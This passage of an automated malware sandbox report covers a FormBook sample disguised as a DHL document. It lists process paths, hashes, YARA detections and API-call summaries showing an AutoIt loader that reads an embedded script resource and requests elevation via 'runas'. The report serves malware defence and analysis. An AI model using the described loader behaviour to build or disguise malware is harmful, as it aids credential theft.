00000004.00000002.3911205481.0000000002540000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
Reputation:	moderate
Has exited:	false

Show Windows behavior

Target ID:	6
Start time:	08:32:39
Start date:	06/01/2025
Path:	C:\Program Files (x86)\nWwCOpIDxawXeiAgMGKqBxiYnKCQTdGWpySGFeZnGTCPUnEYXVYCoTGboUGhvOpdkSP\EBeVwyXzNOzYtNUOvQ.exe
Wow64 process (32bit):	true
Commandline:	"C:\Program Files (x86)\nWwCOpIDxawXeiAgMGKqBxiYnKCQTdGWpySGFeZnGTCPUnEYXVYCoTGboUGhvOpdkSP\EBeVwyXzNOzYtNUOvQ.exe"
Imagebase:	0x320000
File size:	140'800 bytes
MD5 hash:	32B8AD6ECA9094891E792631BAEA9717
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.3912815274.0000000002FC0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000006.00000002.3912815274.0000000002FC0000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	8
Start time:	08:32:50
Start date:	06/01/2025
Path:	C:\Program Files\Mozilla Firefox\firefox.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Mozilla Firefox\Firefox.exe"
Imagebase:	0x7ff6d20e0000
File size:	676'768 bytes
MD5 hash:	C86B1BE9ED6496FE0E0CBE73F81D8045
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Execution Graph

Execution Coverage:	2.6%
Dynamic/Decrypted Code Coverage:	1.1%
Signature Coverage:	3.6%
Total number of Nodes:	1592
Total number of Limit Nodes:	41

Executed Functions

Function 001A42DE Relevance: 21.2, APIs: 9, Strings: 3, Instructions: 235
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetVersionExW.KERNEL32(?), ref: 001A430D

Part of subcall function 001A6B57: _wcslen.LIBCMT ref: 001A6B6A

GetCurrentProcess.KERNEL32(?,0023CB64,00000000,?,?), ref: 001A4422
IsWow64Process.KERNEL32(00000000,?,?), ref: 001A4429
LoadLibraryA.KERNEL32(kernel32.dll,?,?), ref: 001A4454
GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 001A4466
GetNativeSystemInfo.KERNELBASE(?,?,?), ref: 001A4474
FreeLibrary.KERNEL32(00000000,?,?), ref: 001A447B
GetSystemInfo.KERNEL32(?,?,?), ref: 001A44A0

Strings

kernel32.dll, xrefs: 001A444F
|O, xrefs: 001E36F8
GetNativeSystemInfo, xrefs: 001A4460

Memory Dump Source

Source File: 00000000.00000002.1460899024.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true

Associated: 00000000.00000002.1460878541.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460950577.000000000023C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460950577.0000000000262000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1461008497.000000000026C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1461060622.0000000000274000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1a0000_DHL 8350232025-1.jbxd

Similarity

API ID: InfoLibraryProcessSystem$AddressCurrentFreeLoadNativeProcVersionWow64_wcslen
String ID: GetNativeSystemInfo$kernel32.dll$|O
API String ID: 3290436268-3101561225
Opcode ID: 2ca3e9263f9b37219b2f0e4a10cce81a32b87ff381dde3caef25a03d21320b43
Instruction ID: 35573644a333e475a2fa4a68bec4851c81c08478e238265dd66cf1ed68120a6b
Opcode Fuzzy Hash: 2ca3e9263f9b37219b2f0e4a10cce81a32b87ff381dde3caef25a03d21320b43
Instruction Fuzzy Hash: F7A1C27691A7C0CFC715CB7E7C4D1A97FA46F6A300B1848D9E08D97AA2D36046E8CB61

Function 001A42A2 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 61
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateStreamOnHGlobal.COMBASE(00000000,00000001,?,?,?,?,?,001A50AA,?,?,00000000,00000000), ref: 001A42B2
FindResourceExW.KERNEL32(?,0000000A,SCRIPT,00000000,?,?,001A50AA,?,?,00000000,00000000), ref: 001A42C9
LoadResource.KERNEL32(?,00000000,?,?,001A50AA,?,?,00000000,00000000,?,?,?,?,?,?,001A4F20), ref: 001E35BE
SizeofResource.KERNEL32(?,00000000,?,?,001A50AA,?,?,00000000,00000000,?,?,?,?,?,?,001A4F20), ref: 001E35D3
LockResource.KERNEL32(001A50AA,?,?,001A50AA,?,?,00000000,00000000,?,?,?,?,?,?,001A4F20,?), ref: 001E35E6

Strings

SCRIPT, xrefs: 001A42BF

Memory Dump Source

Source File: 00000000.00000002.1460899024.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true

Associated: 00000000.00000002.1460878541.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460950577.000000000023C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460950577.0000000000262000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1461008497.000000000026C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1461060622.0000000000274000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1a0000_DHL 8350232025-1.jbxd

Similarity

API ID: Resource$CreateFindGlobalLoadLockSizeofStream
String ID: SCRIPT
API String ID: 3051347437-3967369404
Opcode ID: fe5ac1ef0caedac3f3f086fa1b33767d9eb80708c357a42ebb6c43879c77af4a
Instruction ID: ec97aca21926e40699942922ac832c9e00d7d43caa12b79947b3085879b2e118
Opcode Fuzzy Hash: fe5ac1ef0caedac3f3f086fa1b33767d9eb80708c357a42ebb6c43879c77af4a
Instruction Fuzzy Hash: 39117C75240700BFD7218B65EC4CF677BB9EBC6B51F20416AB842A6250DBB1D8048B20

Function 001E2BA5 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 62
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetCurrentDirectoryW.KERNEL32(?), ref: 001A2B6B

Part of subcall function 001A3A5A: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,00271418,?,001A2E7F,?,?,?,00000000), ref: 001A3A78

Part of subcall function 001A9CB3: _wcslen.LIBCMT ref: 001A9CBD

GetForegroundWindow.USER32(runas,?,?,?,?,?,00262224), ref: 001E2C10
ShellExecuteW.SHELL32(00000000,?,?,00262224), ref: 001E2C17

Strings

runas, xrefs: 001E2C0B

Memory Dump Source

Source File: 00000000.00000002.1460899024.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true

Associated: 00000000.00000002.1460878541.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460950577.000000000023C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460950577.0000000000262000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1461008497.000000000026C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1461060622.0000000000274000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1a0000_DHL 8350232025-1.jbxd

Similarity

API ID: CurrentDirectoryExecuteFileForegroundModuleNameShellWindow_wcslen
String ID: runas
API String ID: 448630720-4000483414
Opcode ID: 48db60bf590af7890540a91888a9229fb8f33114da0e71c4ca04b9f208f96c8b
Instruction ID: 1c70f067b5aa0d27454a0060867bac931d1a4ea2eb33b804b02529b4a6658b9c
Opcode Fuzzy Hash: 48db60bf590af7890540a91888a9229fb8f33114da0e71c4ca04b9f208f96c8b
Instruction Fuzzy Hash: 4511D6392083459BC714FF78E865ABEB7A4AFB3350F44542DF156520A2CF3185998712

Function 001AD730 Relevance: 21.6, APIs: 14, Instructions: 625windowsleeptimeCOMMON

Download Yara Rule

APIs

GetInputState.USER32 ref: 001AD807
timeGetTime.WINMM ref: 001ADA07
PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 001ADB28
TranslateMessage.USER32(?), ref: 001ADB7B
DispatchMessageW.USER32(?), ref: 001ADB89
PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 001ADB9F
Sleep.KERNEL32(0000000A), ref: 001ADBB1

Memory Dump Source

Source File: 00000000.00000002.1460899024.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true

Associated: 00000000.00000002.1460878541.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460950577.000000000023C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460950577.0000000000262000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1461008497.000000000026C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1461060622.0000000000274000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1a0000_DHL 8350232025-1.jbxd

Similarity

API ID: Message$Peek$DispatchInputSleepStateTimeTranslatetime
String ID:
API String ID: 2189390790-0
Opcode ID: 01686eb86075da1108990fb69d8628d4ea35dc9c348fccd847ef546fbe1b86dc
Instruction ID: 96aa9e238c524f42ab1e60b35128148ca1e5cdf7064ec77a24192b520cd94245
Opcode Fuzzy Hash: 01686eb86075da1108990fb69d8628d4ea35dc9c348fccd847ef546fbe1b86dc
Instruction Fuzzy Hash: A0422134608B45EFD728CF24E888BBAB7E0BF46304F54451DE59A876A1C770E884CB92

Function 001A2CD4 Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 53
windowregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetSysColorBrush.USER32(0000000F), ref: 001A2D07
RegisterClassExW.USER32(00000030), ref: 001A2D31
RegisterWindowMessageW.USER32(TaskbarCreated), ref: 001A2D42
InitCommonControlsEx.COMCTL32(?), ref: 001A2D5F
ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 001A2D6F
LoadIconW.USER32(000000A9), ref: 001A2D85
ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 001A2D94

Strings

TaskbarCreated, xrefs: 001A2D37
AutoIt v3 GUI, xrefs: 001A2D23
0, xrefs: 001A2CE9
+, xrefs: 001A2CF0

Memory Dump Source

Source File: 00000000.00000002.1460899024.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true

Associated: 00000000.00000002.1460878541.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460950577.000000000023C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460950577.0000000000262000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1461008497.000000000026C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1461060622.0000000000274000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1a0000_DHL 8350232025-1.jbxd

Similarity

API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
String ID: +$0$AutoIt v3 GUI$TaskbarCreated
API String ID: 2914291525-1005189915
Opcode ID: 0b75ee07abe551b98f91136518c2a568806cb2e4b849c45fe7384a9447eb4bd2
Instruction ID: 5ddc7996b691b91bd73c3f166321e978eceb12f644e849326431e0dd57ea3c77
Opcode Fuzzy Hash: 0b75ee07abe551b98f91136518c2a568806cb2e4b849c45fe7384a9447eb4bd2
Instruction Fuzzy Hash: 1D21E2B5951218EFDB00DFA8E88DBDDBBB8FB08700F10411AEA15B62A0D7B145908FA0

Function 001E065B Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 272
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 001E039A: CreateFileW.KERNELBASE(00000000,00000000,?,001E0704,?,?,00000000,?,001E0704,00000000,0000000C), ref: 001E03B7

GetLastError.KERNEL32 ref: 001E076F
__dosmaperr.LIBCMT ref: 001E0776
GetFileType.KERNELBASE(00000000), ref: 001E0782
GetLastError.KERNEL32 ref: 001E078C
__dosmaperr.LIBCMT ref: 001E0795
CloseHandle.KERNEL32(00000000), ref: 001E07B5
CloseHandle.KERNEL32(?), ref: 001E08FF
GetLastError.KERNEL32 ref: 001E0931
__dosmaperr.LIBCMT ref: 001E0938

Strings

H, xrefs: 001E08BD

Memory Dump Source

Source File: 00000000.00000002.1460899024.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true

Associated: 00000000.00000002.1460878541.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460950577.000000000023C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460950577.0000000000262000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1461008497.000000000026C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1461060622.0000000000274000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1a0000_DHL 8350232025-1.jbxd

Similarity

API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
String ID: H
API String ID: 4237864984-2852464175
Opcode ID: eaaa36550e883c90b86d1a12243af4f9bea24822383fa638259b706714998c35
Instruction ID: a1a58447023f8060250aaed8431c343ba44ed9457105e4fc5f6c0914295c707c
Opcode Fuzzy Hash: eaaa36550e883c90b86d1a12243af4f9bea24822383fa638259b706714998c35
Instruction Fuzzy Hash: 4AA14932A005848FDF1AAF68DC95BAD7BA1AB1A320F14015DF815AB3D1CB71DC57CB91

Function 001A344D Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 201
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 001A3A5A: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,00271418,?,001A2E7F,?,?,?,00000000), ref: 001A3A78

Part of subcall function 001A3357: GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 001A3379

RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,?,\Include\), ref: 001A356A
RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,?), ref: 001E318D
RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,?,00000000), ref: 001E31CE
RegCloseKey.ADVAPI32(?), ref: 001E3210
_wcslen.LIBCMT ref: 001E3277
_wcslen.LIBCMT ref: 001E3286

Strings

\, xrefs: 001E328C
Software\AutoIt v3\AutoIt, xrefs: 001A3560
\Include\, xrefs: 001A3527
Include, xrefs: 001E3184, 001E31C5

Memory Dump Source

Source File: 00000000.00000002.1460899024.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true

Associated: 00000000.00000002.1460878541.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460950577.000000000023C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460950577.0000000000262000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1461008497.000000000026C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1461060622.0000000000274000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1a0000_DHL 8350232025-1.jbxd

Similarity

API ID: NameQueryValue_wcslen$CloseFileFullModuleOpenPath
String ID: Include$Software\AutoIt v3\AutoIt$\$\Include\
API String ID: 98802146-2727554177
Opcode ID: f178b731dead08067155b4171c9c5556f6cd8cae70edc26f3979cd7d6ee5d3c0
Instruction ID: d058459676024c9696df3025b3b0809dca44213934d6022116a6759e5bff02af
Opcode Fuzzy Hash: f178b731dead08067155b4171c9c5556f6cd8cae70edc26f3979cd7d6ee5d3c0
Instruction Fuzzy Hash: 7D71A171404301DEC304EF65EC899AFBBE8FFA6740F50486EF599971A0DB749A88CB51

Function 001A2B83 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 63
windowregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetSysColorBrush.USER32(0000000F), ref: 001A2B8E
LoadCursorW.USER32(00000000,00007F00), ref: 001A2B9D
LoadIconW.USER32(00000063), ref: 001A2BB3
LoadIconW.USER32(000000A4), ref: 001A2BC5
LoadIconW.USER32(000000A2), ref: 001A2BD7
LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 001A2BEF
RegisterClassExW.USER32(?), ref: 001A2C40

Part of subcall function 001A2CD4: GetSysColorBrush.USER32(0000000F), ref: 001A2D07
Part of subcall function 001A2CD4: RegisterClassExW.USER32(00000030), ref: 001A2D31
Part of subcall function 001A2CD4: RegisterWindowMessageW.USER32(TaskbarCreated), ref: 001A2D42
Part of subcall function 001A2CD4: InitCommonControlsEx.COMCTL32(?), ref: 001A2D5F
Part of subcall function 001A2CD4: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 001A2D6F
Part of subcall function 001A2CD4: LoadIconW.USER32(000000A9), ref: 001A2D85
Part of subcall function 001A2CD4: ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 001A2D94

Strings

#, xrefs: 001A2C16
0, xrefs: 001A2C0F
AutoIt v3, xrefs: 001A2C2F

Memory Dump Source

Source File: 00000000.00000002.1460899024.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true

Associated: 00000000.00000002.1460878541.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460950577.000000000023C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460950577.0000000000262000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1461008497.000000000026C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1461060622.0000000000274000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1a0000_DHL 8350232025-1.jbxd

Similarity

API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
String ID: #$0$AutoIt v3
API String ID: 423443420-4155596026
Opcode ID: f7a68227ef3c7c5a8c16e17b2fe05bc79b8a3a15490b702c3ad8dd814a841607
Instruction ID: 4203b8a323bf20e8a392c6396b2ca7c356d585c9b0e7a3ed9120463a3307af17
Opcode Fuzzy Hash: f7a68227ef3c7c5a8c16e17b2fe05bc79b8a3a15490b702c3ad8dd814a841607
Instruction Fuzzy Hash: 84213A75E00314ABDB109FA9FC4DBA9BFB4FF08B50F10009AE508B66A0D3B145A4CF90

Function 001AB710 Relevance: 16.3, APIs: 1, Strings: 8, Instructions: 587COMMON

Download Yara Rule

APIs

__Init_thread_footer.LIBCMT ref: 001ABB4E

Strings

p%', xrefs: 001ABB32
p#', xrefs: 001ABB6B
x#', xrefs: 001F0168
p#', xrefs: 001ABA72
x#', xrefs: 001F0207
p#', xrefs: 001F024F
p%', xrefs: 001AB8DC
p#', xrefs: 001F0263

Memory Dump Source

Source File: 00000000.00000002.1460899024.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true

Associated: 00000000.00000002.1460878541.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460950577.000000000023C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460950577.0000000000262000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1461008497.000000000026C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1461060622.0000000000274000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1a0000_DHL 8350232025-1.jbxd

Similarity

API ID: Init_thread_footer
String ID: p#'$p#'$p#'$p#'$p%'$p%'$x#'$x#'
API String ID: 1385522511-3771165580
Opcode ID: c5f1489a1f6e476b2258427b438139a216b8cf92253147be082a4d2a644629c8
Instruction ID: 0b80a5cd9f36fce2e8b6255f5ac1567d48bf69d6262f9ed63d67b977944ec238
Opcode Fuzzy Hash: c5f1489a1f6e476b2258427b438139a216b8cf92253147be082a4d2a644629c8
Instruction Fuzzy Hash: 5332FF78A08249DFCB25CF58C8D4ABEB7B5FF4A304F158059EA05AB252C774ED81CB91

Function 001A3170 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 145
windowtimeregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

DefWindowProcW.USER32(?,?,?,?,?,?,?,?,?,001A316A,?,?), ref: 001A31D8
KillTimer.USER32(?,00000001,?,?,?,?,?,001A316A,?,?), ref: 001A3204
SetTimer.USER32(?,00000001,000002EE,00000000), ref: 001A3227
RegisterWindowMessageW.USER32(TaskbarCreated,?,?,?,?,?,001A316A,?,?), ref: 001A3232
CreatePopupMenu.USER32 ref: 001A3246
PostQuitMessage.USER32(00000000), ref: 001A3267

Strings

TaskbarCreated, xrefs: 001A322D

Memory Dump Source

Source File: 00000000.00000002.1460899024.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true

Associated: 00000000.00000002.1460878541.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460950577.000000000023C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460950577.0000000000262000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1461008497.000000000026C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1461060622.0000000000274000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1a0000_DHL 8350232025-1.jbxd

Similarity

API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
String ID: TaskbarCreated
API String ID: 129472671-2362178303
Opcode ID: 6a9159bba73fdcc7aa777d8c25e61a5750c5a38834fdc84b21bc17d162fe7091
Instruction ID: 972b0cf61dad9f52c9f2a280ce226cbbb164eef2b894cbeb0f65785cc9fb68f7
Opcode Fuzzy Hash: 6a9159bba73fdcc7aa777d8c25e61a5750c5a38834fdc84b21bc17d162fe7091
Instruction Fuzzy Hash: FA414C3D250304ABDB182B7CAD1EB7D365DEF47340F144116FA2A962E1CB718E5197A1

Function 01387530 Relevance: 10.7, APIs: 7, Instructions: 239
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateFileW.KERNELBASE(00000000,?,80000000,00000007,00000000,00000003,00000080,00000000,?,00000000), ref: 01387601
VirtualFree.KERNELBASE(00000000,00000000,00008000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 01387827

Memory Dump Source

Source File: 00000000.00000002.1464284078.0000000001384000.00000040.00000020.00020000.00000000.sdmp, Offset: 01384000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1384000_DHL 8350232025-1.jbxd

Similarity

API ID: CreateFileFreeVirtual
String ID:
API String ID: 204039940-0
Opcode ID: 014c9b5c74d83c0a726ef6016946af978a068631e2f3efa1e9065a42f07dad7c
Instruction ID: 115bcfdec4ffa6800c3a240b7ac2001fee85e48083ff18cd83a71f10d438a0e6
Opcode Fuzzy Hash: 014c9b5c74d83c0a726ef6016946af978a068631e2f3efa1e9065a42f07dad7c
Instruction Fuzzy Hash: DEA10C74E00309EBDB14EFA8C894BEEBBB6FF48308F208559E615BB281D7755A41CB54

Function 001A2C63 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 44
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 001A2C91
CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 001A2CB2
ShowWindow.USER32(00000000,?,?,?,?,?,?,001A1CAD,?), ref: 001A2CC6
ShowWindow.USER32(00000000,?,?,?,?,?,?,001A1CAD,?), ref: 001A2CCF

Strings

AutoIt v3, xrefs: 001A2C89, 001A2C8E, 001A2C8F
edit, xrefs: 001A2CAC

Memory Dump Source

Source File: 00000000.00000002.1460899024.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true

Associated: 00000000.00000002.1460878541.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460950577.000000000023C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460950577.0000000000262000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1461008497.000000000026C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1461060622.0000000000274000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1a0000_DHL 8350232025-1.jbxd

Similarity

API ID: Window$CreateShow
String ID: AutoIt v3$edit
API String ID: 1584632944-3779509399
Opcode ID: 723e43a872b089f756c43ba46336e6eb68159bb8379e2ed9a8a185e095a5d3ff
Instruction ID: e07f7fc1eb136ab2221195e5acc834428e39f70941fb46084176cd1ccd281f17
Opcode Fuzzy Hash: 723e43a872b089f756c43ba46336e6eb68159bb8379e2ed9a8a185e095a5d3ff
Instruction Fuzzy Hash: 92F0DA755503907AEB31172BBC0EE777EBDDBC6F50F11409AF908A25A0C66118A0DAB0

Function 01387300 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 145
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 013871F0: Sleep.KERNELBASE(000001F4), ref: 01387201

CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 01387427

Strings

YI5U4897BPNSU, xrefs: 0138748A, 0138748D

Memory Dump Source

Source File: 00000000.00000002.1464284078.0000000001384000.00000040.00000020.00020000.00000000.sdmp, Offset: 01384000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1384000_DHL 8350232025-1.jbxd

Similarity

API ID: CreateFileSleep
String ID: YI5U4897BPNSU
API String ID: 2694422964-847076615
Opcode ID: 036e666bdc159fd258013c1de489defb757193700d8b173e8da5b06f8fb25fb6
Instruction ID: 58e2b5871e5125cad2f953cfe77b2c82f7cd235131b80e6699f5ad1cd395950e
Opcode Fuzzy Hash: 036e666bdc159fd258013c1de489defb757193700d8b173e8da5b06f8fb25fb6
Instruction Fuzzy Hash: 12518131D14249DBEF11EBE8C855BEEBB79AF54304F104199E208BB2C0D7B91B45CBA5

Function 001A3B1C Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 58
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RegOpenKeyExW.KERNELBASE(80000001,Control Panel\Mouse,00000000,00000001,00000000,?,?,80000001,80000001,?,001A3B0F,SwapMouseButtons,00000004,?), ref: 001A3B40
RegQueryValueExW.KERNELBASE(00000000,00000000,00000000,00000000,?,?,?,?,?,80000001,80000001,?,001A3B0F,SwapMouseButtons,00000004,?), ref: 001A3B61
RegCloseKey.KERNELBASE(00000000,?,?,?,80000001,80000001,?,001A3B0F,SwapMouseButtons,00000004,?), ref: 001A3B83

Strings

Control Panel\Mouse, xrefs: 001A3B3E

Memory Dump Source

Source File: 00000000.00000002.1460899024.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true

Associated: 00000000.00000002.1460878541.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460950577.000000000023C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460950577.0000000000262000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1461008497.000000000026C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1461060622.0000000000274000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1a0000_DHL 8350232025-1.jbxd

Similarity

API ID: CloseOpenQueryValue
String ID: Control Panel\Mouse
API String ID: 3677997916-824357125
Opcode ID: 62a9a14ef312cb720003ec6a0dc8acd16df0798931ef4041330c8ea140ba6c68
Instruction ID: e45965fdf73e5bcc0b124695c98e98e1887d9cb29539bc840eddb82597dfbb34
Opcode Fuzzy Hash: 62a9a14ef312cb720003ec6a0dc8acd16df0798931ef4041330c8ea140ba6c68
Instruction Fuzzy Hash: 97112AB9511208FFDB258FA5DC89AAEB7B9EF05744B104459B815E7210D3319E409760

Function 013861F0 Relevance: 6.7, APIs: 4, Instructions: 720
processthreadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

